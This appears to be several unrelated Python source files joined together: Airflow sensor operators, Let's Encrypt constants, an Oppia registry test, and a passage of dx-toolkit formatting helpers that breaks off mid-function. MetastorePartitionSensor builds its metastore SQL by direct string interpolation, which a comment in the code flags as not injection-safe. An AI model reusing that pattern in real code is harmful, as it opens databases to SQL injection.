from past.builtins import basestring

from datetime import datetime
import logging
from urllib.parse import urlparse
from time import sleep

import airflow
from airflow import hooks, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout, AirflowSkipException
from airflow.models import BaseOperator, TaskInstance, Connection as DB
from airflow.hooks.base_hook import BaseHook
from airflow.utils.state import State
from airflow.utils.decorators import apply_defaults


class BaseSensorOperator(BaseOperator):
    """
    Base class for sensor operators.

    A sensor calls :meth:`poke` every ``poke_interval`` seconds and
    finishes successfully as soon as it returns a truthy value. Once
    ``timeout`` seconds have elapsed the task fails — or is skipped
    instead, when ``soft_fail`` is set.

    :param soft_fail: Set to true to mark the task as SKIPPED on failure
    :type soft_fail: bool
    :param poke_interval: Time in seconds that the job should wait in
        between each tries
    :type poke_interval: int
    :param timeout: Time, in seconds before the task times out and fails.
    :type timeout: int
    """
    ui_color = '#e6f1f2'

    @apply_defaults
    def __init__(
            self,
            poke_interval=60,
            timeout=60*60*24*7,
            soft_fail=False,
            *args, **kwargs):
        super(BaseSensorOperator, self).__init__(*args, **kwargs)
        self.timeout = timeout
        self.poke_interval = poke_interval
        self.soft_fail = soft_fail

    def poke(self, context):
        """Condition check; subclasses must override this."""
        raise AirflowException('Override me.')

    def execute(self, context):
        start = datetime.now()
        while not self.poke(context):
            elapsed = (datetime.now() - start).total_seconds()
            if elapsed > self.timeout:
                message = 'Snap. Time is OUT.'
                if self.soft_fail:
                    raise AirflowSkipException(message)
                raise AirflowSensorTimeout(message)
            sleep(self.poke_interval)
        logging.info("Success criteria met. Exiting.")


class SqlSensor(BaseSensorOperator):
    """
    Runs a sql statement until a criteria is met. It will keep trying until
    sql returns no row, or if the first cell in (0, '0', '').

    :param conn_id: The connection to run the sensor against
    :type conn_id: string
    :param sql: The sql to run. To pass, it needs to return at least one cell
        that contains a non-zero / empty string value.
    """
    template_fields = ('sql',)
    template_ext = ('.hql', '.sql',)

    @apply_defaults
    def __init__(self, conn_id, sql, *args, **kwargs):
        self.sql = sql
        self.conn_id = conn_id
        super(SqlSensor, self).__init__(*args, **kwargs)

    def poke(self, context):
        """Return True once the query yields a row whose first cell is
        neither 0, '0' nor ''; an empty result set keeps the sensor waiting.
        """
        hook = BaseHook.get_connection(self.conn_id).get_hook()

        logging.info('Poking: ' + self.sql)
        records = hook.get_records(self.sql)
        if not records:
            return False
        # Bug fix: the original had an unreachable ``print`` statement after
        # both return branches; the pass/fail criteria itself is unchanged.
        return str(records[0][0]) not in ('0', '')


class MetastorePartitionSensor(SqlSensor):
    """
    An alternative to the HivePartitionSensor that talk directly to the
    MySQL db. This was created as a result of observing sub optimal
    queries generated by the Metastore thrift service when hitting
    subpartitioned tables. The Thrift service's queries were written in a
    way that wouldn't leverage the indexes.

    :param schema: the schema
    :type schema: str
    :param table: the table
    :type table: str
    :param partition_name: the partition name, as defined in the PARTITIONS
        table of the Metastore. Order of the fields does matter.
        Examples: ``ds=2016-01-01`` or
        ``ds=2016-01-01/sub=foo`` for a sub partitioned table
    :type partition_name: str
    :param mysql_conn_id: a reference to the MySQL conn_id for the metastore
    :type mysql_conn_id: str
    """
    template_fields = ('partition_name', 'table', 'schema')

    @apply_defaults
    def __init__(
            self, table, partition_name, schema="default",
            mysql_conn_id="metastore_mysql",
            *args, **kwargs):

        self.partition_name = partition_name
        self.table = table
        self.schema = schema
        # Guard so the SQL is built exactly once, on the first poke.
        self.first_poke = True
        self.conn_id = mysql_conn_id
        # NOTE(review): this calls super(SqlSensor, ...), deliberately (it
        # appears) bypassing SqlSensor.__init__, which would require conn_id
        # and sql up front; self.sql is built lazily in poke() instead —
        # confirm before "fixing" the super() target.
        super(SqlSensor, self).__init__(*args, **kwargs)

    def poke(self, context):
        # Lazily build the metastore query on first poke, after template
        # fields (partition_name, table, schema) are in their final form.
        if self.first_poke:
            self.first_poke = False
            # A dotted table name overrides the schema argument.
            if '.' in self.table:
                self.schema, self.table = self.table.split('.')
            # NOTE(review): values are interpolated straight into the SQL;
            # table/schema/partition_name are operator-supplied here, but
            # this is not injection-safe — confirm that is acceptable.
            self.sql = """
            SELECT 'X'
            FROM PARTITIONS A0
            LEFT OUTER JOIN TBLS B0 ON A0.TBL_ID = B0.TBL_ID
            LEFT OUTER JOIN DBS C0 ON B0.DB_ID = C0.DB_ID
            WHERE
                B0.TBL_NAME = '{self.table}' AND
                C0.NAME = '{self.schema}' AND
                A0.PART_NAME = '{self.partition_name}';
            """.format(self=self)
        return super(MetastorePartitionSensor, self).poke(context)


class ExternalTaskSensor(BaseSensorOperator):
    """
    Waits for a task to complete in a different DAG

    :param external_dag_id: The dag_id that contains the task you want to
        wait for
    :type external_dag_id: string
    :param external_task_id: The task_id that contains the task you want to
        wait for
    :type external_task_id: string
    :param allowed_states: list of allowed states, default is ``['success']``
    :type allowed_states: list
    :param execution_delta: time difference with the previous execution to
        look at, the default is the same execution_date as the current task.
        For yesterday, use [positive!] datetime.timedelta(days=1). Either
        execution_delta or execution_date_fn can be passed to
        ExternalTaskSensor, but not both.
    :type execution_delta: datetime.timedelta
    :param execution_date_fn: function that receives the current execution date
        and returns the desired execution date to query. Either execution_delta
        or execution_date_fn can be passed to ExternalTaskSensor, but not both.
    :type execution_date_fn: callable
    """

    @apply_defaults
    def __init__(
            self,
            external_dag_id,
            external_task_id,
            allowed_states=None,
            execution_delta=None,
            execution_date_fn=None,
            *args, **kwargs):
        super(ExternalTaskSensor, self).__init__(*args, **kwargs)
        self.allowed_states = allowed_states or [State.SUCCESS]
        if execution_delta is not None and execution_date_fn is not None:
            # Bug fix: the message previously named a non-existent
            # `execution_date` parameter and rendered as "maybe provided"
            # due to a missing space between the string fragments.
            raise ValueError(
                'Only one of `execution_delta` or `execution_date_fn` may '
                'be provided to ExternalTaskSensor; not both.')

        self.execution_delta = execution_delta
        self.execution_date_fn = execution_date_fn
        self.external_dag_id = external_dag_id
        self.external_task_id = external_task_id

    def poke(self, context):
        """Count TaskInstances of the external task at the target execution
        date that are in an allowed state; a non-zero count succeeds."""
        # Resolve the execution date to look at: shifted back by the delta,
        # computed by the callback, or the current one.
        if self.execution_delta:
            dttm = context['execution_date'] - self.execution_delta
        elif self.execution_date_fn:
            dttm = self.execution_date_fn(context['execution_date'])
        else:
            dttm = context['execution_date']

        logging.info(
            'Poking for '
            '{self.external_dag_id}.'
            '{self.external_task_id} on '
            '{dttm} ... '.format(**locals()))
        TI = TaskInstance

        session = settings.Session()
        count = session.query(TI).filter(
            TI.dag_id == self.external_dag_id,
            TI.task_id == self.external_task_id,
            TI.state.in_(self.allowed_states),
            TI.execution_date == dttm,
        ).count()
        session.commit()
        session.close()
        return count


class NamedHivePartitionSensor(BaseSensorOperator):
    """
    Waits for a set of partitions to show up in Hive.

    :param partition_names: List of fully qualified names of the
        partitions to wait for. A fully qualified name is of the
        form schema.table/pk1=pv1/pk2=pv2, for example,
        default.users/ds=2016-01-01. This is passed as is to the metastore
        Thrift client "get_partitions_by_name" method. Note that
        you cannot use logical operators as in HivePartitionSensor.
    :type partition_names: list of strings
    :param metastore_conn_id: reference to the metastore thrift service
        connection id
    :type metastore_conn_id: str
    """

    template_fields = ('partition_names', )

    @apply_defaults
    def __init__(
            self,
            partition_names,
            metastore_conn_id='metastore_default',
            poke_interval=60*3,
            *args,
            **kwargs):
        super(NamedHivePartitionSensor, self).__init__(
            poke_interval=poke_interval, *args, **kwargs)

        # A bare string is almost certainly a caller mistake: each element
        # must be one fully qualified partition name.
        if isinstance(partition_names, basestring):
            raise TypeError('partition_names must be an array of strings')

        self.metastore_conn_id = metastore_conn_id
        self.partition_names = partition_names
        # Index of the first partition not yet observed; kept across pokes
        # so already-confirmed partitions are not re-checked.
        self.next_poke_idx = 0

    def parse_partition_name(self, partition):
        """Split 'schema.table/partition' into (schema, table, partition).

        :raises ValueError: when the name does not contain exactly one '.'
            or has no '/' separator.
        """
        try:
            schema, table_partition = partition.split('.')
            table, partition = table_partition.split('/', 1)
            return schema, table, partition
        except ValueError:
            # Bug fix: dropped the unused ``as e`` binding; the re-raised
            # message naming the bad input is unchanged.
            raise ValueError('Could not parse ' + partition)

    def poke(self, context):
        """Return True only once every named partition exists."""
        # Lazily create and cache the metastore hook on first use.
        if not hasattr(self, 'hook'):
            self.hook = airflow.hooks.hive_hooks.HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)

        def poke_partition(partition):
            # Check a single fully qualified partition name.
            schema, table, partition = self.parse_partition_name(partition)

            logging.info(
                'Poking for {schema}.{table}/{partition}'.format(**locals())
            )
            return self.hook.check_for_named_partition(
                schema, table, partition)

        while self.next_poke_idx < len(self.partition_names):
            if poke_partition(self.partition_names[self.next_poke_idx]):
                self.next_poke_idx += 1
            else:
                return False

        return True


class HivePartitionSensor(BaseSensorOperator):
    """
    Waits for a partition to show up in Hive.

    Note: Because @partition supports general logical operators, it
    can be inefficient. Consider using NamedHivePartitionSensor instead if
    you don't need the full flexibility of HivePartitionSensor.

    :param table: The name of the table to wait for, supports the dot
        notation (my_database.my_table)
    :type table: string
    :param partition: The partition clause to wait for. This is passed as
        is to the metastore Thrift client "get_partitions_by_filter" method,
        and apparently supports SQL like notation as in `ds='2015-01-01'
        AND type='value'` and > < sings as in "ds>=2015-01-01"
    :type partition: string
    :param metastore_conn_id: reference to the metastore thrift service
        connection id
    :type metastore_conn_id: str
    """
    template_fields = ('schema', 'table', 'partition',)

    @apply_defaults
    def __init__(
            self,
            table, partition="ds='{{ ds }}'",
            metastore_conn_id='metastore_default',
            schema='default',
            poke_interval=60*3,
            *args, **kwargs):
        super(HivePartitionSensor, self).__init__(
            poke_interval=poke_interval, *args, **kwargs)
        # An explicitly-passed empty/None partition falls back to the
        # default templated clause.
        if not partition:
            partition = "ds='{{ ds }}'"
        self.metastore_conn_id = metastore_conn_id
        self.table = table
        self.partition = partition
        self.schema = schema

    def poke(self, context):
        # A dotted table name overrides the schema argument; note this
        # mutates self.table/self.schema in place on every poke that still
        # sees a dot (only the first, since the dot is consumed).
        if '.' in self.table:
            self.schema, self.table = self.table.split('.')
        logging.info(
            'Poking for table {self.schema}.{self.table}, '
            'partition {self.partition}'.format(**locals()))
        # Lazily create and cache the metastore hook on first use.
        if not hasattr(self, 'hook'):
            self.hook = airflow.hooks.hive_hooks.HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)
        return self.hook.check_for_partition(
            self.schema, self.table, self.partition)


class HdfsSensor(BaseSensorOperator):
    """
    Waits for a file or folder to land in HDFS

    :param filepath: HDFS path to wait for
    :type filepath: string
    :param hdfs_conn_id: connection id of the HDFS hook to use
    :type hdfs_conn_id: string
    """
    template_fields = ('filepath',)

    @apply_defaults
    def __init__(
            self,
            filepath,
            hdfs_conn_id='hdfs_default',
            *args, **kwargs):
        super(HdfsSensor, self).__init__(*args, **kwargs)
        self.filepath = filepath
        self.hdfs_conn_id = hdfs_conn_id

    def poke(self, context):
        """Return True once ``self.filepath`` can be listed in HDFS."""
        import airflow.hooks.hdfs_hook
        sb = airflow.hooks.hdfs_hook.HDFSHook(self.hdfs_conn_id).get_conn()
        # The snakebite client is chatty at INFO level; quiet it for polling.
        logging.getLogger("snakebite").setLevel(logging.WARNING)
        logging.info(
            'Poking for file {self.filepath} '.format(**locals()))
        try:
            # Materialize the (presumably lazy) listing so that a missing
            # path actually raises here; only success/failure matters, the
            # result itself was never used.
            list(sb.ls([self.filepath]))
        except Exception:
            # Bug fix: narrowed from a bare ``except:`` so SystemExit and
            # KeyboardInterrupt propagate. Any listing error is treated as
            # "not there yet".
            return False
        return True


class WebHdfsSensor(BaseSensorOperator):
    """
    Waits for a file or folder to land in HDFS, checked through the
    WebHDFS hook.
    """
    template_fields = ('filepath',)

    @apply_defaults
    def __init__(
            self,
            filepath,
            webhdfs_conn_id='webhdfs_default',
            *args, **kwargs):
        super(WebHdfsSensor, self).__init__(*args, **kwargs)
        self.webhdfs_conn_id = webhdfs_conn_id
        self.filepath = filepath

    def poke(self, context):
        """Return True once the path exists according to WebHDFS."""
        hook = airflow.hooks.webhdfs_hook.WebHDFSHook(self.webhdfs_conn_id)
        logging.info(
            'Poking for file {self.filepath} '.format(**locals()))
        return hook.check_for_path(hdfs_path=self.filepath)


class S3KeySensor(BaseSensorOperator):
    """
    Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
    S3 being a key/value it does not support folders. The path is just a key
    a resource.

    :param bucket_key: The key being waited on. Supports full s3:// style url
        or relative path from root level.
    :type bucket_key: str
    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param wildcard_match: whether the bucket_key should be interpreted as a
        Unix wildcard pattern
    :type wildcard_match: bool
    :param s3_conn_id: a reference to the s3 connection
    :type s3_conn_id: str
    """
    template_fields = ('bucket_key', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_key,
            bucket_name=None,
            wildcard_match=False,
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3KeySensor, self).__init__(*args, **kwargs)
        # Fail fast if the referenced connection is not configured.
        session = settings.Session()
        db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
        if not db:
            raise AirflowException("conn_id doesn't exist in the repository")
        # When no bucket is given, split an s3:// style URL into its
        # bucket (netloc) and key (path) parts.
        if bucket_name is None:
            parsed_url = urlparse(bucket_key)
            if parsed_url.netloc == '':
                raise AirflowException('Please provide a bucket_name')
            else:
                bucket_name = parsed_url.netloc
                # Bug fix: ``parsed_url.path[0]`` raised IndexError for URLs
                # with an empty path (e.g. "s3://bucket"); startswith()
                # handles the empty string safely.
                if parsed_url.path.startswith('/'):
                    bucket_key = parsed_url.path[1:]
                else:
                    bucket_key = parsed_url.path
        self.bucket_name = bucket_name
        self.bucket_key = bucket_key
        self.wildcard_match = wildcard_match
        self.s3_conn_id = s3_conn_id
        session.commit()
        session.close()

    def poke(self, context):
        """Return True once the key (or wildcard pattern) exists."""
        import airflow.hooks.S3_hook
        hook = airflow.hooks.S3_hook.S3Hook(s3_conn_id=self.s3_conn_id)
        full_url = "s3://" + self.bucket_name + "/" + self.bucket_key
        logging.info('Poking for key : {full_url}'.format(**locals()))
        if self.wildcard_match:
            return hook.check_for_wildcard_key(self.bucket_key,
                                               self.bucket_name)
        else:
            return hook.check_for_key(self.bucket_key, self.bucket_name)


class S3PrefixSensor(BaseSensorOperator):
    """
    Waits for at least one S3 key with the given prefix to exist.

    A prefix is the leading part of a key, which enables glob-like checks
    (airfl* or SQL LIKE 'airfl%'). An optional delimiter marks the key
    hierarchy and stops the match there; any character that is not special
    to the Python regex engine is accepted as a delimiter.

    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param prefix: The prefix being waited on. Relative path from bucket root level.
    :type prefix: str
    :param delimiter: The delimiter intended to show hierarchy.
        Defaults to '/'.
    :type delimiter: str
    """
    template_fields = ('prefix', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_name,
            prefix, delimiter='/',
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3PrefixSensor, self).__init__(*args, **kwargs)
        # Fail fast if the referenced connection is not configured.
        session = settings.Session()
        conn = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
        if not conn:
            raise AirflowException("conn_id doesn't exist in the repository")
        self.bucket_name = bucket_name
        self.prefix = prefix
        self.delimiter = delimiter
        self.full_url = "s3://" + bucket_name + '/' + prefix
        self.s3_conn_id = s3_conn_id
        session.commit()
        session.close()

    def poke(self, context):
        """Return True once the prefix matches at least one key."""
        logging.info('Poking for prefix : {self.prefix}\n'
                     'in bucket s3://{self.bucket_name}'.format(**locals()))
        import airflow.hooks.S3_hook
        s3 = airflow.hooks.S3_hook.S3Hook(s3_conn_id=self.s3_conn_id)
        return s3.check_for_prefix(
            prefix=self.prefix,
            delimiter=self.delimiter,
            bucket_name=self.bucket_name)


class TimeSensor(BaseSensorOperator):
    """
    Waits until the specified time of the day.

    :param target_time: time after which the job succeeds
    :type target_time: datetime.time
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, target_time, *args, **kwargs):
        super(TimeSensor, self).__init__(*args, **kwargs)
        self.target_time = target_time

    def poke(self, context):
        """Return True once the current wall-clock time passes target_time."""
        now = datetime.now().time()
        logging.info(
            'Checking if the time ({0}) has come'.format(self.target_time))
        return now > self.target_time


class TimeDeltaSensor(BaseSensorOperator):
    """
    Waits for a timedelta after the task's execution_date + schedule_interval.
    In Airflow, the daily task stamped with ``execution_date``
    2016-01-01 can only start running on 2016-01-02. The timedelta here
    represents the time after the execution period has closed.

    :param delta: time length to wait after execution_date before succeeding
    :type delta: datetime.timedelta
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, delta, *args, **kwargs):
        super(TimeDeltaSensor, self).__init__(*args, **kwargs)
        self.delta = delta

    def poke(self, context):
        """Return True once now() passes the schedule boundary plus delta."""
        schedule_end = context['dag'].following_schedule(
            context['execution_date'])
        target_dttm = schedule_end + self.delta
        logging.info('Checking if the time ({0}) has come'.format(target_dttm))
        return datetime.now() > target_dttm


class HttpSensor(BaseSensorOperator):
    """
    Executes a HTTP get statement and returns False on failure:
        404 not found or response_check function returned False

    :param http_conn_id: The connection to run the sensor against
    :type http_conn_id: string
    :param endpoint: The relative part of the full url
    :type endpoint: string
    :param params: The parameters to be added to the GET url
    :type params: a dictionary of string key/value pairs
    :param headers: The HTTP headers to be added to the GET request
    :type headers: a dictionary of string key/value pairs
    :param response_check: A check against the 'requests' response object.
        Returns True for 'pass' and False otherwise.
    :type response_check: A lambda or defined function.
    :param extra_options: Extra options for the 'requests' library, see the
        'requests' documentation (options to modify timeout, ssl, etc.)
    :type extra_options: A dictionary of options, where key is string and value
        depends on the option that's being modified.
    """

    template_fields = ('endpoint',)

    @apply_defaults
    def __init__(self,
                 endpoint,
                 http_conn_id='http_default',
                 params=None,
                 headers=None,
                 response_check=None,
                 extra_options=None, *args, **kwargs):
        super(HttpSensor, self).__init__(*args, **kwargs)
        self.endpoint = endpoint
        self.http_conn_id = http_conn_id
        self.params = params or {}
        self.headers = headers or {}
        self.extra_options = extra_options or {}
        self.response_check = response_check

        self.hook = hooks.http_hook.HttpHook(method='GET', http_conn_id=http_conn_id)

    def poke(self, context):
        """Return True when the GET succeeds (and response_check, if any,
        passes); False on a 404; re-raise any other AirflowException."""
        logging.info('Poking: ' + self.endpoint)
        try:
            response = self.hook.run(self.endpoint,
                                     data=self.params,
                                     headers=self.headers,
                                     extra_options=self.extra_options)
            if self.response_check:
                # run content check on response
                return self.response_check(response)
        except AirflowException as ae:
            if str(ae).startswith("404"):
                return False

            # Bug fix: re-raise with a bare ``raise`` to preserve the
            # original traceback (``raise ae`` rewrote it under Python 2).
            raise

        return True

"""Let's Encrypt constants."""
import logging

from acme import challenges


SETUPTOOLS_PLUGINS_ENTRY_POINT = "letsencrypt.plugins"
"""Setuptools entry point group name for plugins."""


CLI_DEFAULTS = dict(
    config_files=["/etc/letsencrypt/cli.ini"],
    verbose_count=-(logging.WARNING / 10),
    server="https://www.letsencrypt-demo.org/acme/new-reg",
    rsa_key_size=2048,
    rollback_checkpoints=0,
    config_dir="/etc/letsencrypt",
    work_dir="/var/lib/letsencrypt",
    backup_dir="/var/lib/letsencrypt/backups",
    key_dir="/etc/letsencrypt/keys",
    certs_dir="/etc/letsencrypt/certs",
    cert_path="/etc/letsencrypt/certs/cert-letsencrypt.pem",
    chain_path="/etc/letsencrypt/certs/chain-letsencrypt.pem",
    renewer_config_file="/etc/letsencrypt/renewer.conf",
    no_verify_ssl=False,
    dvsni_port=challenges.DVSNI.PORT,
)
"""Defaults for CLI flags and `.IConfig` attributes."""


RENEWER_DEFAULTS = dict(
    renewer_config_file="/etc/letsencrypt/renewer.conf",
    renewal_configs_dir="/etc/letsencrypt/configs",
    archive_dir="/etc/letsencrypt/archive",
    live_dir="/etc/letsencrypt/live",
    renewer_enabled="yes",
    renew_before_expiry="30 days",
    deploy_before_expiry="20 days",
)
"""Defaults for renewer script."""


EXCLUSIVE_CHALLENGES = frozenset([frozenset([
    challenges.DVSNI, challenges.SimpleHTTP])])
"""Mutually exclusive challenges."""


ENHANCEMENTS = ["redirect", "http-header", "ocsp-stapling", "spdy"]
"""List of possible :class:`letsencrypt.interfaces.IInstaller`
enhancements.

List of expected options parameters:
- redirect: None
- http-header: TODO
- ocsp-stapling: TODO
- spdy: TODO

"""


CONFIG_DIRS_MODE = 0o755
"""Directory mode for ``.IConfig.config_dir`` et al."""

TEMP_CHECKPOINT_DIR = "temp_checkpoint"
"""Temporary checkpoint directory (relative to IConfig.work_dir)."""

IN_PROGRESS_DIR = "IN_PROGRESS"
"""Directory used before a permanent checkpoint is finalized (relative to
IConfig.work_dir)."""

CERT_KEY_BACKUP_DIR = "keys-certs"
"""Directory where all certificates and keys are stored (relative to
IConfig.work_dir. Used for easy revocation."""

ACCOUNTS_DIR = "accounts"
"""Directory where all accounts are saved."""

ACCOUNT_KEYS_DIR = "keys"
"""Directory where account keys are saved. Relative to ACCOUNTS_DIR."""

REC_TOKEN_DIR = "recovery_tokens"
"""Directory where all recovery tokens are saved (relative to
IConfig.work_dir)."""

# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for methods in the action registry."""

from __future__ import absolute_import  # pylint: disable=import-only-modules
from __future__ import unicode_literals  # pylint: disable=import-only-modules

from core.domain import action_registry
from core.tests import test_utils


class ActionRegistryUnitTests(test_utils.GenericTestBase):
    """Sanity tests for the learner-action registry."""

    def test_action_registry(self):
        """Verify the registry exposes the expected number of actions."""
        all_actions = action_registry.Registry.get_all_actions()
        self.assertEqual(len(all_actions), 3)

# -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 DNAnexus, Inc.
#
# This file is part of dx-toolkit (DNAnexus platform client libraries).
#
#   Licensed under the Apache License, Version 2.0 (the "License"); you may not
#   use this file except in compliance with the License. You may obtain a copy
#   of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
#   Unless required by applicable law or agreed to in writing, software
#   distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#   WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#   License for the specific language governing permissions and limitations
#   under the License.

'''
This submodule contains helper functions for parsing and printing the
contents of describe hashes for various DNAnexus entities (projects,
containers, dataobjects, apps, and jobs).
'''

from __future__ import print_function, unicode_literals, division, absolute_import

import datetime, time, json, math, sys, copy
import locale
import subprocess
from collections import defaultdict

import dxpy
from .printing import (RED, GREEN, BLUE, YELLOW, WHITE, BOLD, UNDERLINE, ENDC, DELIMITER, get_delimiter, fill)
from ..compat import basestring, USING_PYTHON2

def JOB_STATES(state):
    """Wrap a job/analysis state string in ANSI color codes for display."""
    if state == 'failed':
        prefix = BOLD() + RED()
    elif state == 'done':
        prefix = BOLD() + GREEN()
    elif state in ('running', 'in_progress'):
        prefix = GREEN()
    elif state == 'partially_failed':
        prefix = RED()
    else:
        # Waiting/transitional states are shown in yellow.
        prefix = YELLOW()
    return prefix + state + ENDC()

def DATA_STATES(state):
    """Color-code a data object state; unknown states pass through unchanged."""
    if state in ('open', 'closing'):
        return YELLOW() + state + ENDC()
    if state == 'closed':
        return GREEN() + state + ENDC()
    return state

SIZE_LEVEL = ['bytes', 'KB', 'MB', 'GB', 'TB']


def get_size_str(size):
    """
    Formats a byte size as a string.

    The returned string is no more than 9 characters long.
    """
    if size is None:
        return "0 " + SIZE_LEVEL[0]
    if size == 0:
        magnitude = 0
        level = 0
    else:
        magnitude = math.floor(math.log(size, 10))
        level = int(min(math.floor(magnitude // 3), 4))
    return ('%d' if level == 0 else '%.2f') % (float(size) / 2**(level*10)) + ' ' + SIZE_LEVEL[level]


def parse_typespec(thing):
    """Render a type spec (a string, or a nested $and/$or tree) as text."""
    if isinstance(thing, basestring):
        return thing
    if '$and' in thing:
        inner = ' AND '.join(parse_typespec(t) for t in thing['$and'])
        return '(' + inner + ')'
    if '$or' in thing:
        inner = ' OR '.join(parse_typespec(t) for t in thing['$or'])
        return '(' + inner + ')'
    return 'Type spec could not be parsed'

def get_io_desc(parameter, include_class=True, show_opt=True, app_help_version=False):
    """Render one input/output parameter descriptor as a display string.

    :param parameter: spec entry with at least "name" and "class" keys
    :param include_class: include the class name in the parenthesized info
    :param show_opt: wrap optional/defaulted parameters in square brackets
    :param app_help_version: format for app help output (``-iNAME=...`` style)
    """
    optionalish = "default" in parameter or parameter.get("optional")

    # For interactive help, format array:CLASS inputs as:
    #   -iNAME=CLASS [-iNAME=... [...]]   # required (needs >=1 inputs)
    #   [-iNAME=CLASS [...]]              # optional (needs >=0 inputs)
    if app_help_version and parameter["class"].startswith("array"):
        # Strip "array:" to make a scalar descriptor, then recurse.
        scalar = parameter.copy()
        scalar["class"] = scalar["class"][len("array:"):]
        inner = get_io_desc(scalar, include_class=include_class, show_opt=False,
                            app_help_version=app_help_version)
        repeat = " [-i%s=... [...]]" % (parameter["name"],)
        if optionalish:
            return "[" + inner + repeat + "]"
        return inner + repeat

    pieces = []
    wrap_brackets = show_opt and optionalish
    if wrap_brackets:
        pieces.append("[")
    pieces.append(("-i" if app_help_version else "") + parameter["name"])

    # Parenthesized annotations: class, type constraint, default value.
    annotations = []
    if include_class:
        annotations.append(parameter["class"])
    if "type" in parameter:
        annotations.append("type " + parse_typespec(parameter["type"]))
    if "default" in parameter:
        annotations.append("default=" + json.dumps(parameter["default"]))
    if annotations:
        pieces.append(("=" if app_help_version else " ") +
                      "(" + ", ".join(annotations) + ")")

    if wrap_brackets:
        pieces.append("]")
    return "".join(pieces)

def get_io_spec(spec, skip_fields=None):
    """Render a whole input/output spec as display text.

    Ungrouped parameters come first; grouped ones follow under a
    "<group>:" header, indented. Returns 'null' for a missing spec and
    '-' when nothing is left to show.
    """
    if spec is None:
        return 'null'
    skip = [] if skip_fields is None else skip_fields

    # Bucket parameters by their (optional) group, dropping skipped names.
    grouped = defaultdict(list)
    for param in spec:
        if param["name"] not in skip:
            grouped[param.get('group')].append(param)

    rendered = [get_io_desc(p) for p in grouped.get(None, [])]
    for group_name in grouped:
        if group_name is None:
            continue
        rendered.append("{g}:".format(g=group_name))
        rendered.extend("    " + get_io_desc(p) for p in grouped[group_name])

    if len(skip) > 0:
        rendered.append("<advanced inputs hidden; use --verbose to see more>")
    if not rendered:
        return '-'

    delim = get_delimiter()
    if delim is not None:
        return ('\n' + delim).join(rendered)
    wrapped = [fill(line,
                    subsequent_indent=' ' * 18,
                    width_adjustment=-18) for line in rendered]
    return ('\n' + ' ' * 16).join(wrapped)

def is_job_ref(thing, reftype=dict):
    '''
    :param thing: something that might be a job-based object reference hash
    :param reftype: type that a job-based object reference would be (default is dict)

    A JBOR is either a bare {"job": ..., "field": ...} pair or the same pair
    nested under a single "$dnanexus_link" key.
    '''
    if not isinstance(thing, reftype):
        return False
    if len(thing) == 2:
        return (isinstance(thing.get('field'), basestring) and
                isinstance(thing.get('job'), basestring))
    if len(thing) == 1:
        link = thing.get('$dnanexus_link')
        return (isinstance(link, reftype) and
                isinstance(link.get('field'), basestring) and
                isinstance(link.get('job'), basestring))
    return False

def get_job_from_jbor(thing):
    '''
    :returns: Job ID from a JBOR

    Assumes :func:`is_job_ref` evaluates to True
    '''
    # The reference is either nested under "$dnanexus_link" or at top level.
    target = thing['$dnanexus_link'] if '$dnanexus_link' in thing else thing
    return target['job']

def get_field_from_jbor(thing):
    '''
    :returns: Output field name from a JBOR

    Assumes :func:`is_job_ref` evaluates to True
    '''
    # The reference is either nested under "$dnanexus_link" or at top level.
    target = thing['$dnanexus_link'] if '$dnanexus_link' in thing else thing
    return target['field']

def get_index_from_jbor(thing):
    '''
    :returns: Array index of the JBOR if applicable; None otherwise

    Assumes :func:`is_job_ref` evaluates to True
    '''
    # Only the nested "$dnanexus_link" form can carry an index.
    if '$dnanexus_link' in thing:
        return thing['$dnanexus_link'].get('index')
    return None

def is_metadata_ref(thing, reftype=dict):
    """Return True if ``thing`` is a single-key metadata reference hash."""
    if not (isinstance(thing, reftype) and len(thing) == 1):
        return False
    link = thing.get('$dnanexus_link')
    return isinstance(link, reftype) and isinstance(link.get('metadata'), basestring)

def jbor_to_str(val):
    """Render a JBOR as "job:field" (with ".index" appended if present)."""
    pieces = [get_job_from_jbor(val), ':', get_field_from_jbor(val)]
    index = get_index_from_jbor(val)
    if index is not None:
        pieces.extend(['.', str(index)])
    return ''.join(pieces)

def io_val_to_str(val):
    """Render a single input/output value as a human-readable string.

    JBORs become "job:field", DNAnexus links become IDs (or project:id),
    containers recurse, and everything else falls back to JSON.
    """
    if is_job_ref(val):
        # Job-based object reference
        return jbor_to_str(val)
    if isinstance(val, dict):
        if '$dnanexus_link' in val:
            link = val['$dnanexus_link']
            if isinstance(link, basestring):
                # simple link
                return link
            if 'project' in link and 'id' in link:
                return link['project'] + ':' + link['id']
            return json.dumps(val)
        rendered = [key + ': ' + io_val_to_str(value) for key, value in val.items()]
        return '{ ' + ', '.join(rendered) + ' }'
    if isinstance(val, list):
        if not val:
            return '[]'
        return '[ ' + ', '.join(io_val_to_str(item) for item in val) + ' ]'
    return json.dumps(val)

def job_output_to_str(job_output, prefix='\n', title="Output: ", title_len=None):
    """Format a job's output hash as an indented, wrapped listing."""
    if not job_output:
        return prefix + title + "-"
    if title_len is None:
        title_len = len(title)
    entries = [fill(key + ' = ' + io_val_to_str(value),
                    subsequent_indent=' ' * 9,
